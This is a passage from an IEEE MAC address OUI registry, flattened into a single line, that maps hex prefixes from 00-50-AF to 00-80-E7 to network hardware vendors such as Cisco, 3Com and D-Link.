(hex) IWAKI ELECTRONICS CO., LTD. 00-50-AF (hex) INTERGON, INC. 00-50-B0 (hex) TECHNOLOGY ATLANTA CORPORATION 00-50-B1 (hex) GIDDINGS & LEWIS 00-50-B2 (hex) BRODEL AUTOMATION 00-50-B3 (hex) VOICEBOARD CORPORATION 00-50-B4 (hex) SATCHWELL CONTROL SYSTEMS, LTD 00-50-B5 (hex) FICHET-BAUCHE 00-50-B6 (hex) GOOD WAY IND. CO., LTD. 00-50-B7 (hex) BOSER TECHNOLOGY CO., LTD. 00-50-B8 (hex) INOVA COMPUTERS GMBH & CO. KG 00-50-B9 (hex) XITRON TECHNOLOGIES, INC. 00-50-BA (hex) D-LINK 00-50-BB (hex) CMS TECHNOLOGIES 00-50-BC (hex) HAMMER STORAGE SOLUTIONS 00-50-BD (hex) CISCO SYSTEMS, INC. 00-50-BE (hex) FAST MULTIMEDIA AG 00-50-BF (hex) Metalligence Technology Corp. 00-50-C0 (hex) GATAN, INC. 00-50-C1 (hex) GEMFLEX NETWORKS, LTD. 00-50-C2 (hex) IEEE REGISTRATION AUTHORITY 00-50-C4 (hex) IMD 00-50-C5 (hex) ADS Technologies, Inc 00-50-C6 (hex) LOOP TELECOMMUNICATION INTERNATIONAL, INC. 00-50-C8 (hex) Addonics Technologies, Inc. 00-50-C9 (hex) MASPRO DENKOH CORP. 00-50-CA (hex) NET TO NET TECHNOLOGIES 00-50-CB (hex) JETTER 00-50-CC (hex) XYRATEX 00-50-CD (hex) DIGIANSWER A/S 00-50-CE (hex) LG INTERNATIONAL CORP. 00-50-CF (hex) VANLINK COMMUNICATION TECHNOLOGY RESEARCH INSTITUTE 00-50-D0 (hex) MINERVA SYSTEMS 00-50-D1 (hex) CISCO SYSTEMS, INC. 00-50-D2 (hex) CMC Electronics Inc 00-50-D3 (hex) DIGITAL AUDIO PROCESSING PTY. LTD. 00-50-D4 (hex) JOOHONG INFORMATION & 00-50-D5 (hex) AD SYSTEMS CORP. 00-50-D6 (hex) ATLAS COPCO TOOLS AB 00-50-D7 (hex) TELSTRAT 00-50-D8 (hex) UNICORN COMPUTER CORP. 00-50-D9 (hex) ENGETRON-ENGENHARIA ELETRONICA IND. e COM. LTDA 00-50-DA (hex) 3COM CORPORATION 00-50-DB (hex) CONTEMPORARY CONTROL 00-50-DC (hex) TAS TELEFONBAU A. SCHWABE GMBH & CO. KG 00-50-DD (hex) SERRA SOLDADURA, S.A. 00-50-DE (hex) SIGNUM SYSTEMS CORP. 00-50-DF (hex) AirFiber, Inc. 00-50-E1 (hex) NS TECH ELECTRONICS SDN BHD 00-50-E2 (hex) CISCO SYSTEMS, INC. 00-50-E3 (hex) Motorola, Inc. 00-50-E4 (hex) APPLE COMPUTER, INC. 00-50-E6 (hex) HAKUSAN CORPORATION 00-50-E7 (hex) PARADISE INNOVATIONS (ASIA) 00-50-E8 (hex) NOMADIX INC. 00-50-EA (hex) XEL COMMUNICATIONS, INC. 00-50-EB (hex) ALPHA-TOP CORPORATION 00-50-EC (hex) OLICOM A/S 00-50-ED (hex) ANDA NETWORKS 00-50-EE (hex) TEK DIGITEL CORPORATION 00-50-EF (hex) SPE Systemhaus GmbH 00-50-F0 (hex) CISCO SYSTEMS, INC. 00-50-F1 (hex) Intel Corporation 00-50-F2 (hex) MICROSOFT CORP. 00-50-F3 (hex) GLOBAL NET INFORMATION CO., Ltd. 00-50-F4 (hex) SIGMATEK GMBH & CO. KG 00-50-F6 (hex) PAN-INTERNATIONAL INDUSTRIAL CORP. 00-50-F7 (hex) VENTURE MANUFACTURING (SINGAPORE) LTD. 00-50-F8 (hex) ENTREGA TECHNOLOGIES, INC. 00-50-F9 (hex) SENSORMATIC ACD 00-50-FA (hex) OXTEL, LTD. 00-50-FB (hex) VSK ELECTRONICS 00-50-FC (hex) EDIMAX TECHNOLOGY CO., LTD. 00-50-FD (hex) VISIONCOMM CO., LTD. 00-50-FE (hex) PCTVnet ASA 00-50-FF (hex) HAKKO ELECTRONICS CO., LTD. 00-52-18 (hex) Wuxi Keboda Electron Co.Ltd 00-54-AF (hex) Continental Automotive Systems Inc. 00-5C-B1 (hex) Gospell DIGITAL TECHNOLOGY CO., LTD 00-60-00 (hex) XYCOM INC. 00-60-01 (hex) InnoSys, Inc. 00-60-02 (hex) SCREEN SUBTITLING SYSTEMS, LTD 00-60-03 (hex) TERAOKA WEIGH SYSTEM PTE, LTD. 00-60-04 (hex) COMPUTADORES MODULARES SA 00-60-05 (hex) FEEDBACK DATA LTD. 00-60-06 (hex) SOTEC CO., LTD 00-60-07 (hex) ACRES GAMING, INC. 00-60-08 (hex) 3COM CORPORATION 00-60-09 (hex) CISCO SYSTEMS, INC. 00-60-0A (hex) SORD COMPUTER CORPORATION 00-60-0B (hex) LOGWARE GmbH 00-60-0C (hex) Eurotech Inc. 00-60-0D (hex) Digital Logic GmbH 00-60-0E (hex) WAVENET INTERNATIONAL, INC. 00-60-0F (hex) WESTELL, INC. 00-60-10 (hex) NETWORK MACHINES, INC. 00-60-11 (hex) CRYSTAL SEMICONDUCTOR CORP. 00-60-12 (hex) POWER COMPUTING CORPORATION 00-60-13 (hex) NETSTAL MASCHINEN AG 00-60-14 (hex) EDEC CO., LTD. 00-60-15 (hex) NET2NET CORPORATION 00-60-16 (hex) CLARIION 00-60-17 (hex) TOKIMEC INC. 00-60-18 (hex) STELLAR ONE CORPORATION 00-60-19 (hex) Roche Diagnostics 00-60-1A (hex) KEITHLEY INSTRUMENTS 00-60-1B (hex) MESA ELECTRONICS 00-60-1C (hex) TELXON CORPORATION 00-60-1D (hex) LUCENT TECHNOLOGIES 00-60-1E (hex) SOFTLAB, INC. 00-60-1F (hex) STALLION TECHNOLOGIES 00-60-20 (hex) PIVOTAL NETWORKING, INC. 00-60-21 (hex) DSC CORPORATION 00-60-22 (hex) VICOM SYSTEMS, INC. 00-60-23 (hex) PERICOM SEMICONDUCTOR CORP. 00-60-24 (hex) GRADIENT TECHNOLOGIES, INC. 00-60-25 (hex) ACTIVE IMAGING PLC 00-60-26 (hex) VIKING Modular Solutions 00-60-27 (hex) Superior Modular Products 00-60-28 (hex) MACROVISION CORPORATION 00-60-29 (hex) CARY PERIPHERALS INC. 00-60-2A (hex) SYMICRON COMPUTER COMMUNICATIONS, LTD. 00-60-2B (hex) PEAK AUDIO 00-60-2C (hex) LINX Data Terminals, Inc. 00-60-2D (hex) ALERTON TECHNOLOGIES, INC. 00-60-2E (hex) CYCLADES CORPORATION 00-60-2F (hex) CISCO SYSTEMS, INC. 00-60-30 (hex) VILLAGE TRONIC ENTWICKLUNG 00-60-31 (hex) HRK SYSTEMS 00-60-32 (hex) I-CUBE, INC. 00-60-33 (hex) ACUITY IMAGING, INC. 00-60-34 (hex) ROBERT BOSCH GmbH 00-60-35 (hex) DALLAS SEMICONDUCTOR, INC. 00-60-36 (hex) AIT Austrian Institute of Technology GmbH 00-60-37 (hex) NXP Semiconductors 00-60-38 (hex) Nortel Networks 00-60-39 (hex) SanCom Technology, Inc. 00-60-3A (hex) QUICK CONTROLS LTD. 00-60-3B (hex) AMTEC spa 00-60-3C (hex) HAGIWARA SYS-COM CO., LTD. 00-60-3D (hex) 3CX 00-60-3E (hex) CISCO SYSTEMS, INC. 00-60-3F (hex) PATAPSCO DESIGNS 00-60-40 (hex) NETRO CORP. 00-60-41 (hex) Yokogawa Electric Corporation 00-60-42 (hex) TKS (USA), INC. 00-60-43 (hex) iDirect, INC. 00-60-44 (hex) LITTON/POLY-SCIENTIFIC 00-60-45 (hex) PATHLIGHT TECHNOLOGIES 00-60-46 (hex) VMETRO, INC. 00-60-47 (hex) CISCO SYSTEMS, INC. 00-60-48 (hex) EMC CORPORATION 00-60-49 (hex) VINA TECHNOLOGIES 00-60-4A (hex) SAIC IDEAS GROUP 00-60-4B (hex) Safe-com GmbH & Co. KG 00-60-4C (hex) SAGEM COMMUNICATION 00-60-4D (hex) MMC NETWORKS, INC. 00-60-4E (hex) CYCLE COMPUTER CORPORATION, INC. 00-60-4F (hex) SUZUKI MFG. CO., LTD. 00-60-50 (hex) INTERNIX INC. 00-60-51 (hex) QUALITY SEMICONDUCTOR 00-60-52 (hex) PERIPHERALS ENTERPRISE CO., Ltd. 00-60-53 (hex) TOYODA MACHINE WORKS, LTD. 00-60-54 (hex) CONTROLWARE GMBH 00-60-55 (hex) CORNELL UNIVERSITY 00-60-56 (hex) NETWORK TOOLS, INC. 00-60-57 (hex) MURATA MANUFACTURING CO., LTD. 00-60-58 (hex) COPPER MOUNTAIN COMMUNICATIONS, INC. 00-60-59 (hex) TECHNICAL COMMUNICATIONS CORP. 00-60-5A (hex) CELCORE, INC. 00-60-5B (hex) IntraServer Technology, Inc. 00-60-5C (hex) CISCO SYSTEMS, INC. 00-60-5D (hex) SCANIVALVE CORP. 00-60-5E (hex) LIBERTY TECHNOLOGY NETWORKING 00-60-5F (hex) NIPPON UNISOFT CORPORATION 00-60-60 (hex) DAWNING TECHNOLOGIES, INC. 00-60-61 (hex) WHISTLE COMMUNICATIONS CORP. 00-60-62 (hex) TELESYNC, INC. 00-60-63 (hex) PSION DACOM PLC. 00-60-64 (hex) NETCOMM LIMITED 00-60-65 (hex) BERNECKER & RAINER INDUSTRIE-ELEKTRONIC GmbH 00-60-66 (hex) LACROIX Trafic 00-60-67 (hex) ACER NETXUS INC. 00-60-68 (hex) Dialogic Corporation 00-60-69 (hex) Brocade Communications Systems, Inc. 00-60-6A (hex) MITSUBISHI WIRELESS COMMUNICATIONS. INC. 00-60-6B (hex) Synclayer Inc. 00-60-6C (hex) ARESCOM 00-60-6D (hex) DIGITAL EQUIPMENT CORP. 00-60-6E (hex) DAVICOM SEMICONDUCTOR, INC. 00-60-6F (hex) CLARION CORPORATION OF AMERICA 00-60-70 (hex) CISCO SYSTEMS, INC. 00-60-71 (hex) MIDAS LAB, INC. 00-60-72 (hex) VXL INSTRUMENTS, LIMITED 00-60-73 (hex) REDCREEK COMMUNICATIONS, INC. 00-60-74 (hex) QSC AUDIO PRODUCTS 00-60-75 (hex) PENTEK, INC. 00-60-76 (hex) SCHLUMBERGER TECHNOLOGIES RETAIL PETROLEUM SYSTEMS 00-60-77 (hex) PRISA NETWORKS 00-60-78 (hex) POWER MEASUREMENT LTD. 00-60-79 (hex) Mainstream Data, Inc. 00-60-7A (hex) DVS GmbH 00-60-7B (hex) FORE SYSTEMS, INC. 00-60-7C (hex) WaveAccess, Ltd. 00-60-7D (hex) SENTIENT NETWORKS INC. 00-60-7E (hex) GIGALABS, INC. 00-60-7F (hex) AURORA TECHNOLOGIES, INC. 00-60-80 (hex) MICROTRONIX DATACOM LTD. 00-60-81 (hex) TV/COM INTERNATIONAL 00-60-82 (hex) NOVALINK TECHNOLOGIES, INC. 00-60-83 (hex) CISCO SYSTEMS, INC. 00-60-84 (hex) DIGITAL VIDEO 00-60-85 (hex) Storage Concepts 00-60-86 (hex) LOGIC REPLACEMENT TECH. LTD. 00-60-87 (hex) KANSAI ELECTRIC CO., LTD. 00-60-88 (hex) WHITE MOUNTAIN DSP, INC. 00-60-89 (hex) XATA 00-60-8A (hex) CITADEL COMPUTER 00-60-8B (hex) ConferTech International 00-60-8C (hex) 3COM CORPORATION 00-60-8D (hex) UNIPULSE CORP. 00-60-8E (hex) HE ELECTRONICS, TECHNOLOGIE & SYSTEMTECHNIK GmbH 00-60-8F (hex) TEKRAM TECHNOLOGY CO., LTD. 00-60-90 (hex) Artiza Networks Inc 00-60-91 (hex) FIRST PACIFIC NETWORKS, INC. 00-60-92 (hex) MICRO/SYS, INC. 00-60-93 (hex) VARIAN 00-60-94 (hex) IBM Corp 00-60-95 (hex) ACCU-TIME SYSTEMS, INC. 00-60-96 (hex) T.S. MICROTECH INC. 00-60-97 (hex) 3COM CORPORATION 00-60-98 (hex) HT COMMUNICATIONS 00-60-99 (hex) SBE, Inc. 00-60-9A (hex) NJK TECHNO CO. 00-60-9B (hex) ASTRO-MED, INC. 00-60-9C (hex) Perkin-Elmer Incorporated 00-60-9D (hex) PMI FOOD EQUIPMENT GROUP 00-60-9E (hex) ASC X3 - INFORMATION TECHNOLOGY STANDARDS SECRETARIATS 00-60-9F (hex) PHAST CORPORATION 00-60-A0 (hex) SWITCHED NETWORK TECHNOLOGIES, INC. 00-60-A1 (hex) VPNet, Inc. 00-60-A2 (hex) NIHON UNISYS LIMITED CO. 00-60-A3 (hex) CONTINUUM TECHNOLOGY CORP. 00-60-A4 (hex) GRINAKER SYSTEM TECHNOLOGIES 00-60-A5 (hex) PERFORMANCE TELECOM CORP. 00-60-A6 (hex) PARTICLE MEASURING SYSTEMS 00-60-A7 (hex) MICROSENS GmbH & CO. KG 00-60-A8 (hex) TIDOMAT AB 00-60-A9 (hex) GESYTEC MbH 00-60-AA (hex) INTELLIGENT DEVICES INC. (IDI) 00-60-AB (hex) LARSCOM INCORPORATED 00-60-AC (hex) RESILIENCE CORPORATION 00-60-AD (hex) MegaChips Corporation 00-60-AE (hex) TRIO INFORMATION SYSTEMS AB 00-60-AF (hex) PACIFIC MICRO DATA, INC. 00-60-B0 (hex) HEWLETT-PACKARD CO. 00-60-B1 (hex) INPUT/OUTPUT, INC. 00-60-B2 (hex) PROCESS CONTROL CORP. 00-60-B3 (hex) Z-COM, INC. 00-60-B4 (hex) GLENAYRE R&D INC. 00-60-B5 (hex) KEBA GmbH 00-60-B6 (hex) LAND COMPUTER CO., LTD. 00-60-B7 (hex) CHANNELMATIC, INC. 00-60-B8 (hex) CORELIS Inc. 00-60-B9 (hex) NEC Infrontia Corporation 00-60-BA (hex) SAHARA NETWORKS, INC. 00-60-BB (hex) CABLETRON - NETLINK, INC. 00-60-BC (hex) KeunYoung Electronics & Communication Co., Ltd. 00-60-BD (hex) HUBBELL-PULSECOM 00-60-BE (hex) WEBTRONICS 00-60-BF (hex) MACRAIGOR SYSTEMS, INC. 00-60-C0 (hex) Nera Networks AS 00-60-C1 (hex) WaveSpan Corporation 00-60-C2 (hex) MPL AG 00-60-C3 (hex) NETVISION CORPORATION 00-60-C4 (hex) SOLITON SYSTEMS K.K. 00-60-C5 (hex) ANCOT CORP. 00-60-C6 (hex) DCS AG 00-60-C7 (hex) AMATI COMMUNICATIONS CORP. 00-60-C8 (hex) KUKA WELDING SYSTEMS & ROBOTS 00-60-C9 (hex) ControlNet, Inc. 00-60-CA (hex) HARMONIC SYSTEMS INCORPORATED 00-60-CB (hex) HITACHI ZOSEN CORPORATION 00-60-CC (hex) EMTRAK, INCORPORATED 00-60-CD (hex) VideoServer, Inc. 00-60-CE (hex) ACCLAIM COMMUNICATIONS 00-60-CF (hex) ALTEON NETWORKS, INC. 00-60-D0 (hex) SNMP RESEARCH INCORPORATED 00-60-D1 (hex) CASCADE COMMUNICATIONS 00-60-D2 (hex) LUCENT TECHNOLOGIES TAIWAN TELECOMMUNICATIONS CO., LTD. 00-60-D3 (hex) AT&T 00-60-D4 (hex) ELDAT COMMUNICATION LTD. 00-60-D5 (hex) MIYACHI TECHNOS CORP. 00-60-D6 (hex) NovAtel Wireless Technologies Ltd. 00-60-D7 (hex) ECOLE POLYTECHNIQUE FEDERALE DE LAUSANNE (EPFL) 00-60-D8 (hex) ELMIC SYSTEMS, INC. 00-60-D9 (hex) TRANSYS NETWORKS INC. 00-60-DA (hex) JBM ELECTRONICS CO. 00-60-DB (hex) NTP ELEKTRONIK A/S 00-60-DC (hex) Toyo Network Systems & System Integration Co. LTD 00-60-DD (hex) MYRICOM, INC. 00-60-DE (hex) Kayser-Threde GmbH 00-60-DF (hex) Brocade Communications Systems, Inc. 00-60-E0 (hex) AXIOM TECHNOLOGY CO., LTD. 00-60-E1 (hex) ORCKIT COMMUNICATIONS LTD. 00-60-E2 (hex) QUEST ENGINEERING & DEVELOPMENT 00-60-E3 (hex) ARBIN INSTRUMENTS 00-60-E4 (hex) COMPUSERVE, INC. 00-60-E5 (hex) FUJI AUTOMATION CO., LTD. 00-60-E6 (hex) SHOMITI SYSTEMS INCORPORATED 00-60-E7 (hex) RANDATA 00-60-E8 (hex) HITACHI COMPUTER PRODUCTS (AMERICA), INC. 00-60-E9 (hex) ATOP TECHNOLOGIES, INC. 00-60-EA (hex) StreamLogic 00-60-EB (hex) FOURTHTRACK SYSTEMS 00-60-EC (hex) HERMARY OPTO ELECTRONICS INC. 00-60-ED (hex) RICARDO TEST AUTOMATION LTD. 00-60-EE (hex) APOLLO 00-60-EF (hex) FLYTECH TECHNOLOGY CO., LTD. 00-60-F0 (hex) JOHNSON & JOHNSON MEDICAL, INC 00-60-F1 (hex) EXP COMPUTER, INC. 00-60-F2 (hex) LASERGRAPHICS, INC. 00-60-F3 (hex) Performance Analysis Broadband, Spirent plc 00-60-F4 (hex) ADVANCED COMPUTER SOLUTIONS, Inc. 00-60-F5 (hex) ICON WEST, INC. 00-60-F6 (hex) NEXTEST COMMUNICATIONS PRODUCTS, INC. 00-60-F7 (hex) DATAFUSION SYSTEMS 00-60-F8 (hex) Loran International Technologies Inc. 00-60-F9 (hex) DIAMOND LANE COMMUNICATIONS 00-60-FA (hex) EDUCATIONAL TECHNOLOGY RESOURCES, INC. 00-60-FB (hex) PACKETEER, INC. 00-60-FC (hex) CONSERVATION THROUGH INNOVATION LTD. 00-60-FD (hex) NetICs, Inc. 00-60-FE (hex) LYNX SYSTEM DEVELOPERS, INC. 00-60-FF (hex) QuVis, Inc. 00-64-40 (hex) Cisco Systems 00-64-A6 (hex) Maquet CardioVascular 00-6B-A0 (hex) SHENZHEN UNIVERSAL INTELLISYS PTE LTD 00-6D-FB (hex) Vutrix (UK) Ltd 00-70-B0 (hex) M/A-COM INC. COMPANIES 00-70-B3 (hex) DATA RECALL LTD. 00-78-9E (hex) SAGEMCOM 00-7F-28 (hex) Actiontec Electronics, Inc 00-80-00 (hex) MULTITECH SYSTEMS, INC. 00-80-01 (hex) PERIPHONICS CORPORATION 00-80-02 (hex) SATELCOM (UK) LTD 00-80-03 (hex) HYTEC ELECTRONICS LTD. 00-80-04 (hex) ANTLOW COMMUNICATIONS, LTD. 00-80-05 (hex) CACTUS COMPUTER INC. 00-80-06 (hex) COMPUADD CORPORATION 00-80-07 (hex) DLOG NC-SYSTEME 00-80-08 (hex) DYNATECH COMPUTER SYSTEMS 00-80-09 (hex) JUPITER SYSTEMS, INC. 00-80-0A (hex) JAPAN COMPUTER CORP. 00-80-0B (hex) CSK CORPORATION 00-80-0C (hex) VIDECOM LIMITED HENLEY-ON-THAMES OXON RG9 1HG 00-80-0D (hex) VOSSWINKEL F.U. 00-80-0E (hex) ATLANTIX CORPORATION 00-80-0F (hex) STANDARD MICROSYSTEMS 00-80-10 (hex) COMMODORE INTERNATIONAL 00-80-11 (hex) DIGITAL SYSTEMS INT'L. INC. 00-80-12 (hex) INTEGRATED MEASUREMENT SYSTEMS 00-80-13 (hex) THOMAS-CONRAD CORPORATION 00-80-14 (hex) ESPRIT SYSTEMS 00-80-15 (hex) SEIKO SYSTEMS, INC. 00-80-16 (hex) WANDEL AND GOLTERMANN 00-80-17 (hex) PFU LIMITED 00-80-18 (hex) KOBE STEEL, LTD. 00-80-19 (hex) DAYNA COMMUNICATIONS, INC. 00-80-1A (hex) BELL ATLANTIC 00-80-1B (hex) KODIAK TECHNOLOGY 00-80-1C (hex) NEWPORT SYSTEMS SOLUTIONS 00-80-1D (hex) INTEGRATED INFERENCE MACHINES 00-80-1E (hex) XINETRON, INC. 00-80-1F (hex) KRUPP ATLAS ELECTRONIK GMBH 00-80-20 (hex) NETWORK PRODUCTS 00-80-21 (hex) Alcatel Canada Inc. 00-80-22 (hex) SCAN-OPTICS 00-80-23 (hex) INTEGRATED BUSINESS NETWORKS 00-80-24 (hex) KALPANA, INC. 00-80-25 (hex) STOLLMANN GMBH 00-80-26 (hex) NETWORK PRODUCTS CORPORATION 00-80-27 (hex) ADAPTIVE SYSTEMS, INC. 00-80-28 (hex) TRADPOST (HK) LTD 00-80-29 (hex) EAGLE TECHNOLOGY, INC. 00-80-2A (hex) TEST SYSTEMS & SIMULATIONS INC 00-80-2B (hex) INTEGRATED MARKETING CO 00-80-2C (hex) THE SAGE GROUP PLC 00-80-2D (hex) XYLOGICS INC 00-80-2E (hex) CASTLE ROCK COMPUTING 00-80-2F (hex) NATIONAL INSTRUMENTS CORP. 00-80-30 (hex) NEXUS ELECTRONICS 00-80-31 (hex) BASYS, CORP. 00-80-32 (hex) ACCESS CO., LTD. 00-80-33 (hex) EMS Aviation, Inc. 00-80-34 (hex) SMT GOUPIL 00-80-35 (hex) TECHNOLOGY WORKS, INC. 00-80-36 (hex) REFLEX MANUFACTURING SYSTEMS 00-80-37 (hex) Ericsson Group 00-80-38 (hex) DATA RESEARCH & APPLICATIONS 00-80-39 (hex) ALCATEL STC AUSTRALIA 00-80-3A (hex) VARITYPER, INC. 00-80-3B (hex) APT COMMUNICATIONS, INC. 00-80-3C (hex) TVS ELECTRONICS LTD 00-80-3D (hex) SURIGIKEN CO., LTD. 00-80-3E (hex) SYNERNETICS 00-80-3F (hex) TATUNG COMPANY 00-80-40 (hex) JOHN FLUKE MANUFACTURING CO. 00-80-41 (hex) VEB KOMBINAT ROBOTRON 00-80-42 (hex) Emerson Network Power 00-80-43 (hex) NETWORLD, INC. 00-80-44 (hex) SYSTECH COMPUTER CORP. 00-80-45 (hex) MATSUSHITA ELECTRIC IND. CO 00-80-46 (hex) UNIVERSITY OF TORONTO 00-80-47 (hex) IN-NET CORP. 00-80-48 (hex) COMPEX INCORPORATED 00-80-49 (hex) NISSIN ELECTRIC CO., LTD. 00-80-4A (hex) PRO-LOG 00-80-4B (hex) EAGLE TECHNOLOGIES PTY.LTD. 00-80-4C (hex) CONTEC CO., LTD. 00-80-4D (hex) CYCLONE MICROSYSTEMS, INC. 00-80-4E (hex) APEX COMPUTER COMPANY 00-80-4F (hex) DAIKIN INDUSTRIES, LTD. 00-80-50 (hex) ZIATECH CORPORATION 00-80-51 (hex) FIBERMUX 00-80-52 (hex) TECHNICALLY ELITE CONCEPTS 00-80-53 (hex) INTELLICOM, INC. 00-80-54 (hex) FRONTIER TECHNOLOGIES CORP. 00-80-55 (hex) FERMILAB 00-80-56 (hex) SPHINX ELEKTRONIK GMBH 00-80-57 (hex) ADSOFT, LTD. 00-80-58 (hex) PRINTER SYSTEMS CORPORATION 00-80-59 (hex) STANLEY ELECTRIC CO., LTD 00-80-5A (hex) TULIP COMPUTERS INTERNAT'L B.V 00-80-5B (hex) CONDOR SYSTEMS, INC. 00-80-5C (hex) AGILIS CORPORATION 00-80-5D (hex) CANSTAR 00-80-5E (hex) LSI LOGIC CORPORATION 00-80-5F (hex) Hewlett-Packard Company 00-80-60 (hex) NETWORK INTERFACE CORPORATION 00-80-61 (hex) LITTON SYSTEMS, INC. 00-80-62 (hex) INTERFACE CO. 00-80-63 (hex) Hirschmann Automation and Control GmbH 00-80-64 (hex) WYSE TECHNOLOGY 00-80-65 (hex) CYBERGRAPHIC SYSTEMS PTY LTD. 00-80-66 (hex) ARCOM CONTROL SYSTEMS, LTD. 00-80-67 (hex) SQUARE D COMPANY 00-80-68 (hex) YAMATECH SCIENTIFIC LTD. 00-80-69 (hex) COMPUTONE SYSTEMS 00-80-6A (hex) ERI (EMPAC RESEARCH INC.) 00-80-6B (hex) SCHMID TELECOMMUNICATION 00-80-6C (hex) CEGELEC PROJECTS LTD 00-80-6D (hex) CENTURY SYSTEMS CORP. 00-80-6E (hex) NIPPON STEEL CORPORATION 00-80-6F (hex) ONELAN LTD. 00-80-70 (hex) COMPUTADORAS MICRON 00-80-71 (hex) SAI TECHNOLOGY 00-80-72 (hex) MICROPLEX SYSTEMS LTD. 00-80-73 (hex) DWB ASSOCIATES 00-80-74 (hex) FISHER CONTROLS 00-80-75 (hex) PARSYTEC GMBH 00-80-76 (hex) MCNC 00-80-77 (hex) BROTHER INDUSTRIES, LTD. 00-80-78 (hex) PRACTICAL PERIPHERALS, INC. 00-80-79 (hex) MICROBUS DESIGNS LTD. 00-80-7A (hex) AITECH SYSTEMS LTD. 00-80-7B (hex) ARTEL COMMUNICATIONS CORP. 00-80-7C (hex) FIBERCOM, INC. 00-80-7D (hex) EQUINOX SYSTEMS INC. 00-80-7E (hex) SOUTHERN PACIFIC LTD. 00-80-7F (hex) DY-4 INCORPORATED 00-80-80 (hex) DATAMEDIA CORPORATION 00-80-81 (hex) KENDALL SQUARE RESEARCH CORP. 00-80-82 (hex) PEP MODULAR COMPUTERS GMBH 00-80-83 (hex) AMDAHL 00-80-84 (hex) THE CLOUD INC. 00-80-85 (hex) H-THREE SYSTEMS CORPORATION 00-80-86 (hex) COMPUTER GENERATION INC. 00-80-87 (hex) OKI ELECTRIC INDUSTRY CO., LTD 00-80-88 (hex) VICTOR COMPANY OF JAPAN, LTD. 00-80-89 (hex) TECNETICS (PTY) LTD. 00-80-8A (hex) SUMMIT MICROSYSTEMS CORP. 00-80-8B (hex) DACOLL LIMITED 00-80-8C (hex) NetScout Systems, Inc. 00-80-8D (hex) WESTCOAST TECHNOLOGY B.V. 00-80-8E (hex) RADSTONE TECHNOLOGY 00-80-8F (hex) C. ITOH ELECTRONICS, INC. 00-80-90 (hex) MICROTEK INTERNATIONAL, INC. 00-80-91 (hex) TOKYO ELECTRIC CO.,LTD 00-80-92 (hex) Silex Technology, Inc. 00-80-93 (hex) XYRON CORPORATION 00-80-94 (hex) ALFA LAVAL AUTOMATION AB 00-80-95 (hex) BASIC MERTON HANDELSGES.M.B.H. 00-80-96 (hex) HUMAN DESIGNED SYSTEMS, INC. 00-80-97 (hex) CENTRALP AUTOMATISMES 00-80-98 (hex) TDK CORPORATION 00-80-99 (hex) KLOCKNER MOELLER IPC 00-80-9A (hex) NOVUS NETWORKS LTD 00-80-9B (hex) JUSTSYSTEM CORPORATION 00-80-9C (hex) LUXCOM, INC. 00-80-9D (hex) Commscraft Ltd. 00-80-9E (hex) DATUS GMBH 00-80-9F (hex) ALCATEL BUSINESS SYSTEMS 00-80-A0 (hex) EDISA HEWLETT PACKARD S/A 00-80-A1 (hex) MICROTEST, INC. 00-80-A2 (hex) CREATIVE ELECTRONIC SYSTEMS 00-80-A3 (hex) Lantronix 00-80-A4 (hex) LIBERTY ELECTRONICS 00-80-A5 (hex) SPEED INTERNATIONAL 00-80-A6 (hex) REPUBLIC TECHNOLOGY, INC. 00-80-A7 (hex) Honeywell International Inc 00-80-A8 (hex) VITACOM CORPORATION 00-80-A9 (hex) CLEARPOINT RESEARCH 00-80-AA (hex) MAXPEED 00-80-AB (hex) DUKANE NETWORK INTEGRATION 00-80-AC (hex) IMLOGIX, DIVISION OF GENESYS 00-80-AD (hex) CNET TECHNOLOGY, INC. 00-80-AE (hex) HUGHES NETWORK SYSTEMS 00-80-AF (hex) ALLUMER CO., LTD. 00-80-B0 (hex) ADVANCED INFORMATION 00-80-B1 (hex) SOFTCOM A/S 00-80-B2 (hex) NETWORK EQUIPMENT TECHNOLOGIES 00-80-B3 (hex) AVAL DATA CORPORATION 00-80-B4 (hex) SOPHIA SYSTEMS 00-80-B5 (hex) UNITED NETWORKS INC. 00-80-B6 (hex) THEMIS COMPUTER 00-80-B7 (hex) STELLAR COMPUTER 00-80-B8 (hex) BUG, INCORPORATED 00-80-B9 (hex) ARCHE TECHNOLIGIES INC. 00-80-BA (hex) SPECIALIX (ASIA) PTE, LTD 00-80-BB (hex) HUGHES LAN SYSTEMS 00-80-BC (hex) HITACHI ENGINEERING CO., LTD 00-80-BD (hex) THE FURUKAWA ELECTRIC CO., LTD 00-80-BE (hex) ARIES RESEARCH 00-80-BF (hex) TAKAOKA ELECTRIC MFG. CO. LTD. 00-80-C0 (hex) PENRIL DATACOMM 00-80-C1 (hex) LANEX CORPORATION 00-80-C2 (hex) IEEE 802.1 COMMITTEE 00-80-C3 (hex) BICC INFORMATION SYSTEMS & SVC 00-80-C4 (hex) DOCUMENT TECHNOLOGIES, INC. 00-80-C5 (hex) NOVELLCO DE MEXICO 00-80-C6 (hex) NATIONAL DATACOMM CORPORATION 00-80-C7 (hex) XIRCOM 00-80-C8 (hex) D-LINK SYSTEMS, INC. 00-80-C9 (hex) ALBERTA MICROELECTRONIC CENTRE 00-80-CA (hex) NETCOM RESEARCH INCORPORATED 00-80-CB (hex) FALCO DATA PRODUCTS 00-80-CC (hex) MICROWAVE BYPASS SYSTEMS 00-80-CD (hex) MICRONICS COMPUTER, INC. 00-80-CE (hex) BROADCAST TELEVISION SYSTEMS 00-80-CF (hex) EMBEDDED PERFORMANCE INC. 00-80-D0 (hex) COMPUTER PERIPHERALS, INC. 00-80-D1 (hex) KIMTRON CORPORATION 00-80-D2 (hex) SHINNIHONDENKO CO., LTD. 00-80-D3 (hex) SHIVA CORP. 00-80-D4 (hex) CHASE RESEARCH LTD. 00-80-D5 (hex) CADRE TECHNOLOGIES 00-80-D6 (hex) NUVOTECH, INC. 00-80-D7 (hex) Fantum Engineering 00-80-D8 (hex) NETWORK PERIPHERALS INC. 00-80-D9 (hex) EMK Elektronik GmbH & Co. KG 00-80-DA (hex) BRUEL & KJAER 00-80-DB (hex) GRAPHON CORPORATION 00-80-DC (hex) PICKER INTERNATIONAL 00-80-DD (hex) GMX INC/GIMIX 00-80-DE (hex) GIPSI S.A. 00-80-DF (hex) ADC CODENOLL TECHNOLOGY CORP. 00-80-E0 (hex) XTP SYSTEMS, INC. 00-80-E1 (hex) STMICROELECTRONICS 00-80-E2 (hex) T.D.I. CO., LTD. 00-80-E3 (hex) CORAL NETWORK CORPORATION 00-80-E4 (hex) NORTHWEST DIGITAL SYSTEMS, INC 00-80-E5 (hex) LSI Logic Corporation 00-80-E6 (hex) PEER NETWORKS, INC. 00-80-E7 (hex) LYNWOOD 